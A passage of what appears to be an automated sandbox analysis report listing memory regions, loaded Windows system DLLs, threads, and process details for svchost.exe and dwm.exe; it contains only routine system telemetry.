"\\Windows\\System32\\SystemEventsBrokerServer.dll" (normalized: "c:\\windows\\system32\\systemeventsbrokerserver.dll") Region: id = 5155 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 5156 start_va = 0x7ffaf2e00000 end_va = 0x7ffaf2e08fff entry_point = 0x7ffaf2e00000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 5157 start_va = 0x7ffaf2e10000 end_va = 0x7ffaf2e1bfff entry_point = 0x7ffaf2e10000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 5158 start_va = 0x7ffaf2e20000 end_va = 0x7ffaf2ee0fff entry_point = 0x7ffaf2e20000 region_type = mapped_file name = "lsm.dll" filename = "\\Windows\\System32\\lsm.dll" (normalized: "c:\\windows\\system32\\lsm.dll") Region: id = 5159 start_va = 0x7ffaf2ef0000 end_va = 0x7ffaf2fddfff entry_point = 0x7ffaf2ef0000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 5160 start_va = 0x7ffaf2fe0000 end_va = 0x7ffaf3063fff entry_point = 0x7ffaf2fe0000 region_type = mapped_file name = "psmserviceexthost.dll" filename = "\\Windows\\System32\\PsmServiceExtHost.dll" (normalized: "c:\\windows\\system32\\psmserviceexthost.dll") Region: id = 5161 start_va = 0x7ffaf3070000 end_va = 0x7ffaf3097fff entry_point = 0x7ffaf3070000 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 5162 start_va = 0x7ffaf30a0000 end_va = 0x7ffaf30d1fff entry_point = 0x7ffaf30a0000 region_type = mapped_file name = "psmsrv.dll" filename = "\\Windows\\System32\\psmsrv.dll" (normalized: "c:\\windows\\system32\\psmsrv.dll") Region: id = 5163 start_va = 0x7ffaf30e0000 end_va = 0x7ffaf3165fff entry_point = 0x7ffaf30e0000 region_type = mapped_file name = "bisrv.dll" filename = "\\Windows\\System32\\bisrv.dll" (normalized: "c:\\windows\\system32\\bisrv.dll") Region: id = 5164 start_va = 0x7ffaf3280000 end_va = 0x7ffaf335afff entry_point = 0x7ffaf3280000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5165 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 5166 start_va = 0x7ffaf3390000 end_va = 0x7ffaf3487fff entry_point = 0x7ffaf3390000 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 5167 start_va = 0x7ffaf3490000 end_va = 0x7ffaf349bfff entry_point = 0x7ffaf3490000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 5168 start_va = 0x7ffaf34a0000 end_va = 0x7ffaf34b5fff entry_point = 0x7ffaf34a0000 region_type = mapped_file name = "umpoext.dll" filename = "\\Windows\\System32\\umpoext.dll" (normalized: "c:\\windows\\system32\\umpoext.dll") Region: id = 5169 start_va = 0x7ffaf34c0000 end_va = 0x7ffaf34dafff entry_point = 0x7ffaf34c0000 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 5170 start_va = 0x7ffaf34e0000 end_va = 0x7ffaf34fffff entry_point = 0x7ffaf34e0000 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 5171 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5172 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5173 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5174 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5175 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5176 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5177 start_va = 0x7ffaf4230000 end_va = 0x7ffaf4249fff entry_point = 0x7ffaf4230000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 5178 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5179 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5180 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5181 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5182 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5183 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5184 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5185 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5186 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5187 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5188 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5189 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5190 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5191 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5192 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5193 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5194 start_va = 0x7ffaf7250000 end_va = 0x7ffaf72befff entry_point = 0x7ffaf7250000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 5195 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5196 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5197 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6213 start_va = 0xdbba700000 end_va = 0xdbba77ffff entry_point = 0x0 region_type = private name = "private_0x000000dbba700000" filename = "" Region: id = 6214 start_va = 0x7ff787eb6000 end_va = 0x7ff787eb7fff entry_point = 0x0 region_type = private name = "private_0x00007ff787eb6000" filename = "" Region: id = 7333 start_va = 0xdbba900000 end_va = 0xdbba97afff entry_point = 0xdbba900000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Thread: id = 357 os_tid = 0xf50 Thread: id = 358 os_tid = 0xe3c Thread: id = 359 os_tid = 0xbd8 Thread: id = 360 os_tid = 0x834 Thread: id = 361 os_tid = 0x82c Thread: id = 362 os_tid = 0x68c Thread: id = 363 os_tid = 0x644 Thread: id = 364 os_tid = 0x590 Thread: id = 365 os_tid = 0x630 Thread: id = 366 os_tid = 0x5fc Thread: id = 367 os_tid = 0x3f8 Thread: id = 368 os_tid = 0x320 Thread: id = 369 os_tid = 0x2cc Thread: id = 370 os_tid = 0x2c8 Thread: id = 371 os_tid = 0x2a8 Thread: id = 372 os_tid = 0x2a4 Thread: id = 373 os_tid = 0x284 Thread: id = 374 os_tid = 0x264 Thread: id = 375 os_tid = 0x258 Thread: id = 376 os_tid = 0x244 Thread: id = 803 os_tid = 0xb20 Process: id = "41" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x49245000" os_pid = "0x26c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:000092df" [0xc000000f], "LOCAL" [0x7] Region: id = 4068 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4069 start_va = 0x92481b0000 end_va = 0x92481bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092481b0000" filename = "" Region: id = 4070 start_va = 0x92481c0000 end_va = 0x92481c2fff entry_point = 0x92481c0000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 4071 start_va = 0x92481d0000 end_va = 0x92481e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092481d0000" filename = "" Region: id = 4072 start_va = 0x92481f0000 end_va = 0x924826ffff entry_point = 0x0 region_type = private name = "private_0x00000092481f0000" filename = "" Region: id = 4073 start_va = 0x9248270000 end_va = 0x9248273fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009248270000" filename = "" Region: id = 4074 start_va = 0x9248280000 end_va = 0x9248280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009248280000" filename = "" Region: id = 4075 start_va = 0x9248290000 end_va = 0x9248291fff entry_point = 0x0 region_type = private name = "private_0x0000009248290000" filename = "" Region: id = 4076 start_va = 0x92482a0000 end_va = 0x924835dfff entry_point = 0x92482a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4077 start_va = 0x9248360000 end_va = 0x9248360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009248360000" filename = "" Region: id = 4078 start_va = 0x9248370000 end_va = 0x9248370fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009248370000" filename = "" Region: id = 4079 start_va = 0x9248390000 end_va = 0x9248396fff entry_point = 0x0 region_type = private name = "private_0x0000009248390000" filename = "" Region: id = 4080 start_va = 0x9248400000 end_va = 0x92484fffff entry_point = 0x0 region_type = private name = "private_0x0000009248400000" filename = "" Region: id = 4081 start_va = 0x92485f0000 end_va = 0x92485f6fff entry_point = 0x0 region_type = private name = "private_0x00000092485f0000" filename = "" Region: id = 4082 start_va = 0x9248600000 end_va = 0x924867ffff entry_point = 0x0 region_type = private name = "private_0x0000009248600000" filename = "" Region: id = 4083 start_va = 0x9248680000 end_va = 0x924877ffff entry_point = 0x0 region_type = private name = "private_0x0000009248680000" filename = "" Region: id = 4084 start_va = 0x9248800000 end_va = 0x92488fffff entry_point = 0x0 region_type = private name = "private_0x0000009248800000" filename = "" Region: id = 4085 start_va = 0x9248900000 end_va = 0x9248c36fff entry_point = 0x9248900000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4086 start_va = 0x9248d40000 end_va = 0x9248e3ffff entry_point = 0x0 region_type = private name = "private_0x0000009248d40000" filename = "" Region: id = 4087 start_va = 0x9248e40000 end_va = 0x9248f3ffff entry_point = 0x0 region_type = private name = "private_0x0000009248e40000" filename = "" Region: id = 4088 start_va = 0x9249040000 end_va = 0x924913ffff entry_point = 0x0 region_type = private name = "private_0x0000009249040000" filename = "" Region: id = 4089 start_va = 0x9249140000 end_va = 0x924923ffff entry_point = 0x0 region_type = private name = "private_0x0000009249140000" filename = "" Region: id = 4090 start_va = 0x9249440000 end_va = 0x924953ffff entry_point = 0x0 region_type = private name = "private_0x0000009249440000" filename = "" Region: id = 4091 start_va = 0x9249540000 end_va = 0x924963ffff entry_point = 0x0 region_type = private name = "private_0x0000009249540000" filename = "" Region: id = 4092 start_va = 0x9249640000 end_va = 0x924973ffff entry_point = 0x0 region_type = private name = "private_0x0000009249640000" filename = "" Region: id = 4093 start_va = 0x9249800000 end_va = 0x92498fffff entry_point = 0x0 region_type = private name = "private_0x0000009249800000" filename = "" Region: id = 4094 start_va = 0x7df5ffa20000 end_va = 0x7ff5ffa1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa20000" filename = "" Region: id = 4095 start_va = 0x7ff78786e000 end_va = 0x7ff78786ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78786e000" filename = "" Region: id = 4096 start_va = 0x7ff787870000 end_va = 0x7ff787871fff entry_point = 0x0 region_type = private name = "private_0x00007ff787870000" filename = "" Region: id = 4097 start_va = 0x7ff787872000 end_va = 0x7ff787873fff entry_point = 0x0 region_type = private name = "private_0x00007ff787872000" filename = "" Region: id = 4098 start_va = 0x7ff787878000 end_va = 0x7ff787879fff entry_point = 0x0 region_type = private name = "private_0x00007ff787878000" filename = "" Region: id = 4099 start_va = 0x7ff78787a000 end_va = 0x7ff78787bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78787a000" filename = "" Region: id = 4100 start_va = 0x7ff78787e000 end_va = 0x7ff78787ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78787e000" filename = "" Region: id = 4101 start_va = 0x7ff787880000 end_va = 0x7ff78797ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787880000" filename = "" Region: id = 4102 start_va = 0x7ff787980000 end_va = 0x7ff7879a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787980000" filename = "" Region: id = 4103 start_va = 0x7ff7879a3000 end_va = 0x7ff7879a4fff entry_point = 0x0 region_type = private name = "private_0x00007ff7879a3000" filename = "" Region: id = 4104 start_va = 0x7ff7879a7000 end_va = 0x7ff7879a8fff entry_point = 0x0 region_type = private name = "private_0x00007ff7879a7000" filename = "" Region: id = 4105 start_va = 0x7ff7879a9000 end_va = 0x7ff7879aafff entry_point = 0x0 region_type = private name = "private_0x00007ff7879a9000" filename = "" Region: id = 4106 start_va = 0x7ff7879ab000 end_va = 0x7ff7879abfff entry_point = 0x0 region_type = private name = "private_0x00007ff7879ab000" filename = "" Region: id = 4107 start_va = 0x7ff7879ae000 end_va = 0x7ff7879affff entry_point = 0x0 region_type = private name = "private_0x00007ff7879ae000" filename = "" Region: id = 4108 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4109 start_va = 0x7ffae8170000 end_va = 0x7ffae8185fff entry_point = 0x7ffae8170000 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 4110 start_va = 0x7ffaf0920000 end_va = 0x7ffaf0987fff entry_point = 0x7ffaf0920000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4111 start_va = 0x7ffaf13a0000 end_va = 0x7ffaf13affff entry_point = 0x7ffaf13a0000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 4112 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4113 start_va = 0x7ffaf3170000 end_va = 0x7ffaf31a1fff entry_point = 0x7ffaf3170000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 4114 start_va = 0x7ffaf31b0000 end_va = 0x7ffaf3231fff entry_point = 0x7ffaf31b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 4115 start_va = 0x7ffaf3240000 end_va = 0x7ffaf3252fff entry_point = 0x7ffaf3240000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4116 start_va = 0x7ffaf3260000 end_va = 0x7ffaf3276fff entry_point = 0x7ffaf3260000 region_type = mapped_file name = "rpcepmap.dll" filename = "\\Windows\\System32\\RpcEpMap.dll" (normalized: "c:\\windows\\system32\\rpcepmap.dll") Region: id = 4117 start_va = 0x7ffaf3280000 end_va = 0x7ffaf335afff entry_point = 0x7ffaf3280000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4118 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4119 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4120 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4121 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4122 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4123 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4124 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4125 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4126 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4127 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4128 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4129 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4130 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4131 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4132 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4133 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4134 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4135 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4136 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4137 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4138 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6380 start_va = 0x9248c40000 end_va = 0x9248d3ffff entry_point = 0x0 region_type = private name = "private_0x0000009248c40000" filename = "" Region: id = 6381 start_va = 0x7ff7879ac000 end_va = 0x7ff7879adfff entry_point = 0x0 region_type = private name = "private_0x00007ff7879ac000" filename = "" Region: id = 7197 start_va = 0x9248500000 end_va = 0x924857afff entry_point = 0x9248500000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Thread: id = 377 os_tid = 0x6c0 Thread: id = 378 os_tid = 0x6a8 Thread: id = 379 os_tid = 0x618 Thread: id = 380 os_tid = 0x14c Thread: id = 381 os_tid = 0x330 Thread: id = 382 os_tid = 0x2a0 Thread: id = 383 os_tid = 0x298 Thread: id = 384 os_tid = 0x288 Thread: id = 385 os_tid = 0x280 Thread: id = 386 os_tid = 0x270 Thread: id = 817 os_tid = 0x7f4 Process: id = "42" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x4879a000" os_pid = "0x2d8" os_integrity_level = "0x4000" os_privileges = "0x240800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x1cc" cmd_line = "\"dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Window Manager\\DWM-1" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local Service" [0x7], "LOCAL" [0x7], "Window Manager\\Window Manager Group" [0x7] Region: id = 2873 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2874 start_va = 0xca542c0000 end_va = 0xca542cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca542c0000" filename = "" Region: id = 2875 start_va = 0xca542d0000 end_va = 0xca542d6fff entry_point = 0x0 region_type = private name = "private_0x000000ca542d0000" filename = "" Region: id = 2876 start_va = 0xca542e0000 end_va = 